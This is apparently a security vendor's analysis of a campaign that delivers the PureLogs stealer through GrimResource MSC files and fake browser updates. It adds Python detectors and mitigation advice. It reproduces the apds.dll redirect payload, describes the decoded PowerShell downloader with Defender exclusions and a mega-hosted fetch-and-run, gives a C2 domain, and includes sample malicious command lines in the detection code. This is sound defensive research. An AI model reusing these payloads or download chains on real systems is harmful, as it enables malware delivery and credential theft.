Managed Detection and Response
From GrimResource to PureLogs Stealer: Dissecting a Recent Attack
September 18, 2025 | 7 min read
Thomas Elkins and Joshua Green


BlueVoyant’s Threat Fusion Cell (TFC) and Security Operations Center (SOC) researchers have uncovered a recent cyber campaign featuring a unique twist on fake browser updates. This attack leveraged the GrimResource vulnerability and delivered the PureLogs stealer malware to targeted environments through disguised Microsoft Management Console (MSC) files.
What is GrimResource?
In June 2024, Elastic Security Labs published research on a vulnerability being exploited through Microsoft Management Console (MSC) files. Attackers were able to embed malicious code into these files by taking advantage of an older cross-site scripting (XSS) flaw in a component called apds.dll, which is triggered when MSC files are opened via mmc.exe—the tool used to manage administrative snap-ins on Windows.
MSC files are configuration files used to launch various built-in system management tools, and this particular flaw—tracked as CVE-2024-43572, also known as GrimResource—allowed attackers to misuse them in unexpected ways. Although Microsoft has since patched the vulnerability, the use of MSC files for malicious purposes appears to be resurfacing.
The Initial Attack
This campaign began like a traditional fake browser update attack: an unsuspecting user visited a compromised website, typically after clicking a phishing link or falling victim to SEO poisoning. This attack stood out, however, by targeting active users on a login portal page: users browsing other tabs of the site were not presented with the fake update prompt, which indicates the threat group may have been focusing on the website’s active users rather than on visitors.
During the investigation, BlueVoyant researchers discovered that the compromised portal page’s navigation button had been modified to point to a custom page crafted by the threat actor, named ‘wp-assets-analyzer.html’. This page contains obfuscated JavaScript code that appears to quietly fingerprint the visiting user’s system configuration, with a specific focus on Windows 10/11 systems.

Figure 1 - JavaScript code to detect user agent and OS version
It first checks whether the browser is running on a 64-bit Windows 10 or 11 OS using the navigator.userAgent string. If so, it creates a WebGL context to extract GPU fingerprinting data using the WEBGL_debug_renderer_info extension. These values are then compared against hardcoded blacklists (e.g., “VMware”, “SwiftShader”) and whitelists (e.g., “NVIDIA”, “Apple M1”) to detect virtualized environments. If the system passes, it sends a POST request to hxxps://verified[.]run/api/check, which responds with a JSON payload. One key field in this payload is a custom "ref" value, created by Base64-encoding the first 50 characters of the userAgent string.

Figure 2 – Custom request header sent to hxxps://verified[.]run/api/check
Depending on the server’s response, the script either writes new content to the page or redirects to Google if the checks fail.
When analyzed, the page loaded the code of a ClickFix campaign: a fake page disguised as a networking error, instructing users to copy and paste code into the Run command window using the typical ‘Windows + R’ shortcut.
During the incident investigation, however, BlueVoyant determined that the user was presented with a different page, indicating that their browser was out of date. We then observed the user download a file named ‘Critical Update.msc’ (4c57640f9b6fc5bfa0676f91d08672ded5a26168).
After acquiring the file from the impacted host, we analyzed its contents and observed that it contained obfuscated code that was passed to res[:]//apds[.]dll/redirect[.]html?target=javascript[:]eval(external.Document.ScopeNamespace.GetRoot().Name) for execution.
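As an added detection example (not from the original post or BlueVoyant’s tooling), the following Python scans an MSC console file for the apds.dll redirect string quoted above and for oversized StringTable entries that could carry an encoded payload. The sample XML is constructed and deliberately minimal; the element names follow the MSC XML layout but the content is not the incident file.

```python
import re
import xml.etree.ElementTree as ET

# Constructed, minimal MSC-style XML (not the incident's file): a StringTable
# entry carrying the apds.dll redirect that GrimResource abuses, plus one
# oversized entry standing in for an encoded payload.
SAMPLE_MSC = """<MMC_ConsoleFile ConsoleVersion="3.0">
  <StringTables><StringTable><Strings>
    <String ID="1" Refs="1">Critical Update</String>
    <String ID="2" Refs="1">res://apds.dll/redirect.html?target=javascript:eval(external.Document.ScopeNamespace.GetRoot().Name)</String>
    <String ID="3" Refs="1">{blob}</String>
  </Strings></StringTable></StringTables>
</MMC_ConsoleFile>""".format(blob="".join(chr(65 + i % 26) for i in range(600)))

BENIGN_MSC = """<MMC_ConsoleFile ConsoleVersion="3.0">
  <StringTables><StringTable><Strings>
    <String ID="1" Refs="1">Computer Management (Local)</String>
  </Strings></StringTable></StringTables>
</MMC_ConsoleFile>"""

# Indicators of the apds.dll redirect technique; any one is worth an alert.
PATTERNS = [
    ("apds_redirect", re.compile(r"res://apds\.dll/redirect\.html", re.I)),
    ("javascript_uri", re.compile(r"javascript:", re.I)),
    ("doc_scope_eval", re.compile(r"external\.Document\.ScopeNamespace", re.I)),
]
MAX_STRING_LEN = 512  # legitimate snap-in strings are short labels

def scan_msc(xml_text):
    """Return [(indicator, locator)] for suspicious text or attribute values.

    locator is 'Tag#ID' when the element has an ID attribute, else the tag name.
    An empty list means nothing matched; a malformed file is itself reported."""
    try:
        root = ET.fromstring(xml_text)
    except ET.ParseError as exc:
        return [("unparseable_xml", str(exc))]
    findings = []
    for elem in root.iter():
        locator = f"{elem.tag}#{elem.get('ID')}" if elem.get("ID") else elem.tag
        for value in [elem.text or ""] + list(elem.attrib.values()):
            for name, rx in PATTERNS:
                if rx.search(value):
                    findings.append((name, locator))
            if len(value) > MAX_STRING_LEN and " " not in value.strip():
                findings.append(("oversized_string", locator))
    return findings
```

Attribute values are scanned as well as element text, so a payload placed in a node Name attribute (which the quoted GetRoot().Name reference reads) is also covered.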

Figure 3 – Encoded payload in ‘Critical Update.msc’ file
Using CyberChef, we decoded the contents and found VBScript code that uses the WScript Shell object to launch a PowerShell command.

Figure 4 – Decoded PowerShell command contained in ‘Critical Update.msc’
The PowerShell command does the following:
- Runs with execution policy bypass (-EP Bypass) and no profile (-NoP) to avoid detection and restrictions.
- Adds multiple Windows Defender exclusions to suppress antivirus scanning in key folders:
  - C:\Users\Public
  - C:\Users\Public\Desktop
  - $env:TEMP
  - C:\
  - $env:USERPROFILE\Desktop
  - $env:USERPROFILE\Downloads
- Suppresses error messages for each exclusion using -ErrorAction SilentlyContinue.
- Launches a new, minimized CMD window that executes the following:
  - Attempts to download an executable using curl.
  - The executable is saved to C:\Users\Public\K3MKuoAtPs.exe.
  - The executable is downloaded from an obfuscated mega[.]io URL: hxxps://s3.g.s4.mega[.]io/icniciy%6dvix%6d5cwexbsy5nwj5voi7ropgjssn/o1o1o1/BRAVO/PR/TVXSGFMQ.exe (%6d = m).
  - Deletes a previous executable if it exists: C:\Users\Public\lf8JUsyp94.exe.
  - If the curl download fails, uses PowerShell’s Invoke-WebRequest (iwr) to download the same file.
  - Renames the downloaded file: K3MKuoAtPs.exe → lf8JUsyp94.exe.
  - Executes the downloaded file.
  - Kills the mmc.exe process using the following command: taskkill /IM mmc.exe /F
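As an added detection example (not from the original post or BlueVoyant’s tooling), the following Python evaluates constructed Sysmon-style process-creation events against the stages of the chain described above, so that each stage becomes a separately alertable rule and the number of rules tripped on one host can drive confidence. Field names, the benign control event and the placeholder download URL are assumptions.

```python
import re

# Constructed Sysmon-style process-creation events (not real telemetry) that
# mirror the chain described above; the download URL is a placeholder.
SAMPLE_EVENTS = [
    {"pid": 101, "parent": r"C:\Program Files\Microsoft\Edge\msedge.exe",
     "image": r"C:\Windows\System32\mmc.exe",
     "cmd": r'"C:\Windows\System32\mmc.exe" "C:\Users\alice\Downloads\Critical Update.msc"'},
    {"pid": 102, "parent": r"C:\Windows\System32\mmc.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": r"powershell -EP Bypass -NoP -W Hidden -c Add-MpPreference -ExclusionPath 'C:\Users\Public' -ErrorAction SilentlyContinue"},
    {"pid": 103, "parent": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "image": r"C:\Windows\System32\cmd.exe",
     "cmd": r"cmd /c start /min cmd /c curl -o C:\Users\Public\K3MKuoAtPs.exe https://PLACEHOLDER.invalid/TVXSGFMQ.exe & taskkill /IM mmc.exe /F"},
    {"pid": 104, "parent": r"C:\Windows\explorer.exe",  # benign admin script
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": r"powershell -NoP -File C:\Scripts\inventory.ps1"},
]

BROWSERS = {"chrome.exe", "msedge.exe", "firefox.exe", "brave.exe"}
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe"}

# Rule = (name, allowed images, allowed parents, command-line regex); None = any.
RULES = [
    ("browser_spawns_mmc", {"mmc.exe"}, BROWSERS, None),
    ("mmc_spawns_shell", SHELLS, {"mmc.exe"}, None),
    ("ps_policy_bypass", {"powershell.exe", "pwsh.exe"}, None,
     r"-e(?:xecutionpolicy|p)\s+bypass.*-nop\b|-nop\b.*-e(?:xecutionpolicy|p)\s+bypass"),
    ("defender_exclusion", None, None, r"add-mppreference\b.*-exclusionpath"),
    ("download_to_public", None, None,
     r"\b(?:curl|iwr|invoke-webrequest)\b.*(?:c:\\users\\public|\\appdata\\local\\temp|\\downloads\\)"),
    ("kill_mmc", None, None, r"taskkill\b.*/im\s+mmc\.exe"),
]

def matches(rule, e):
    _, images, parents, rx = rule
    return ((images is None or e["image"] in images)
            and (parents is None or e["parent"] in parents)
            and (rx is None or re.search(rx, e["cmd"], re.I) is not None))

def evaluate(events):
    """Return {pid: [matched rule names]} for every event that trips a rule."""
    hits = {}
    for e in events:
        # Normalise full paths to lower-case file names before matching.
        n = dict(e, image=e["image"].rsplit("\\", 1)[-1].lower(),
                 parent=e["parent"].rsplit("\\", 1)[-1].lower())
        matched = [r[0] for r in RULES if matches(r, n)]
        if matched:
            hits[e["pid"]] = matched
    return hits
```

The benign -NoP inventory script trips nothing because ps_policy_bypass requires both flags on one command line, which keeps the rule quiet on ordinary administrative PowerShell.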
Even though the payload URL was no longer active, BlueVoyant researchers were able to acquire the executable, TVXSGFMQ.exe (f321252e4b2872d4e995c4cf16f83287457a7174), and analyze its contents in a controlled environment.
Payload Analysis
BlueVoyant researchers found the executable TVXSGFMQ.exe was packaged using the 7-Zip self-extracting installer format. 7-Zip, an open-source file archiver, can create Windows executables that self-extract without requiring 7-Zip to be installed.

Figure 5 – Detect It Easy (DIE) identifying 7-Zip Installer
TVXSGFMQ.exe contained numerous Dynamic Link Libraries (DLLs), a couple of interestingly named files and an executable named Vorte-drive.exe. During analysis of Vorte-drive.exe, BlueVoyant researchers observed it loading several of the DLLs at runtime, including the following:
- boost_locale.dll
- boost_timer.dll
- bcrypt.dll
- sqlite3_plex.dll
- avcodec-59.dll
- avutil-57.dll
- WS2_32.dll
- libssl-3.dll
- libcrypto-3.dll
- libcurl.dll
- fmt.dll
- dxgi.dll
- KERNEL32.dll
- SHELL32.dll
- ADVAPI32.dll
- MSVCP140.dll
- VCRUNTIME140.dll

Figure 6 – Libraries loaded by ‘Vorte-drive.exe’
During analysis of the loaded libraries, BlueVoyant researchers identified that avutil-57.dll (SHA1: 0B0A4471CD5AB3FD51C976F94E6B0BFF01DB1DEE) had a corrupt digital signature, suggesting it had been modified.

Further inspection revealed that the DLL contained additional code used to read a suspicious file named Thiecktieg.mchn, specifically searching for the byte sequence C6 A5 79 EA. BlueVoyant researchers found this behavior aligns with the known malware loader, IDAT Loader (a.k.a. HijackLoader, GhostPulse Loader).

Figure 8 – ‘Thiecktieg.mchn’ containing byte sequence C6 A5 79 EA with decoded .IDAT
Using a config extractor, BlueVoyant researchers extracted the embedded payload and determined it was PureLogs stealer which communicated with C2 s162486.love-is[.]nexus.
BlueVoyant researchers found other similar initial URLs suggesting this attack chain began around mid-June and continued through at least early September. Many of the related URLs appear to primarily push ClickFix attacks, which may suggest the operators are simply testing the efficacy of the GrimResource attack.
Nevertheless, this campaign is abusing the patched GrimResource (CVE-2024-43572) vector by disguising fake browser updates as MSC files delivered from compromised login portals; once opened via mmc.exe, the chain runs VBScript and PowerShell with policy bypass to add Defender exclusions, fetch a 7-Zip SFX package from a cloud host, side-load a tampered DLL, and ultimately deploy the PureLogs stealer (via IDAT/HijackLoader). This places organizations at immediate risk of credential theft and follow-on compromise, with activity observed from mid-June through at least early September.
Remaining Questions
As BlueVoyant continues to track this campaign, there remain several areas where further intelligence and community collaboration would be valuable, starting with the attribution of this activity to a known threat actor. The observed TTPs overlap with several eCrime and Initial Access Broker groups; however, no single tracked adversary aligns perfectly with the unique combination of the GrimResource exploit, specific payload chain, and victim-targeting methodology. Further research is needed to:
- Attribute these activities to a specific actor or group.
- Map the full operational infrastructure, including the network of command-and-control servers and exfiltration points.
- Understand the post-exploitation monetization strategy, including how stolen data and credentials are leveraged or sold.
- Identify the complete malware arsenal in use beyond PureLogs stealer.
By continuing to analyze the campaign’s TTPs and collaborating with the wider security community, BlueVoyant aims to uncover additional insights that will strengthen collective defenses against this evolving threat.
Mitigation Strategies
Enterprise organizations can minimize the risks associated with campaigns exploiting GrimResource and similar attack vectors by implementing a layered defense strategy:
Endpoint Protection and Monitoring
- Restrict Script and Binary Execution: Implement application control policies, such as Windows Defender Application Control or AppLocker, to block the execution of untrusted .msc files, particularly those downloaded from the Internet. Additionally, restrict the execution of PowerShell scripts from common user-writable directories like C:\Users\Public and $env:TEMP.
- Enhance PowerShell Logging: Enable and monitor PowerShell script block logging and command-line process auditing. This can help detect the use of suspicious arguments like -EP Bypass and -NoP, which are used to circumvent execution policies.
- Monitor for Defense Evasion: Configure endpoint detection and response (EDR) tools to alert on attempts to add new Windows Defender exclusions. Enable tamper protection features to prevent the malware from disabling security controls.
- Detect Behavioral Anomalies: Monitor for suspicious process chains, such as mmc.exe being launched by a web browser, which in turn spawns powershell.exe or cmd.exe. EDR solutions should also be configured to detect DLL sideloading, where a legitimate executable (Vorte-drive.exe) loads a malicious DLL (avutil-57.dll).
Network Defense
- Block Malicious Indicators: Implement network egress filtering to block access to the known command-and-control (C2) domain s162486[.]love-is[.]nexus and other malicious URLs identified in the campaign's indicators of compromise (IOCs).
- Web Content Filtering: Utilize web filtering to block access to uncategorized or newly registered domains, as these are often used to host malicious landing pages and payloads. Scrutinize traffic to cloud storage services like Mega if they are not used for legitimate business purposes.
Vulnerability and Patch Management
- Apply Security Patches: The primary exploit vector is CVE-2024-43572 (GrimResource). Organizations should prioritize applying the relevant Microsoft patch to all Windows systems to close this vulnerability and prevent the initial execution via malicious MSC files.
User Awareness and Training
- Educate on Social Engineering: Train users to recognize the tactics of fake browser update campaigns and ClickFix lures. Specifically, users should be warned against downloading and opening files, especially .msc files, from unexpected pop-ups or prompts.
- Promote Secure Practices: Reinforce that legitimate software updates are typically handled automatically through the application itself or via managed enterprise deployment tools, not through manual downloads prompted by a website.